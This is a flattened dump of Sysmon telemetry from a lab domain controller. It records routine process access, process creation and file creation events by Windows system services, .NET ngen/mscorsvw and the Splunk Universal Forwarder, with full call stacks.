13:49:46.104{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.104{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.104{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FA-6005-4703-00000000A301}4536C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.104{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91FA-6005-4703-00000000A301}4536C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.105{59A5CD1D-91FA-6005-4703-00000000A301}4536C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.979{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-5A03-00000000A301}3376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.979{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FB-6005-5A03-00000000A301}3376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wo
w64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.713{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FB-6005-5903-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.698{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-5903-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:47.698{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FB-6005-5903-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:47.667{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FB-6005-5803-00000000A301}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.651{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-5803-00000000A301}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:47.651{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FB-6005-5803-00000000A301}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:47.635{59A5CD1D-91FB-6005-5703-00000000A301}3088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c10-0\Microsoft.ActiveDirectory.TRLParserInterop.dll2021-01-18 13:49:47.635 10341000x80000000000000007669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:47.573{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FB-6005-5703-00000000A301}3088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.573{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-5703-00000000A301}3088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:47.573{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FB-6005-5703-00000000A301}3088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:47.526{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FB-6005-5603-00000000A301}3232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.510{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-5603-00000000A301}3232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:47.510{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FB-6005-5603-00000000A301}3232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:47.495{59A5CD1D-91FB-6005-5503-00000000A301}2912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b60-0\Microsoft.ActiveDirectory.TRLParser.dll2021-01-18 13:49:47.495 10341000x80000000000000007662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:47.417{59A5CD1D-91FB-6005-5303-00000000A301}10043768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.354{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FB-6005-5503-00000000A301}2912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:47.338{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-5503-00000000A301}2912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.338{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FB-6005-5503-00000000A301}2912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:47.307{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FB-6005-5403-00000000A301}4688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e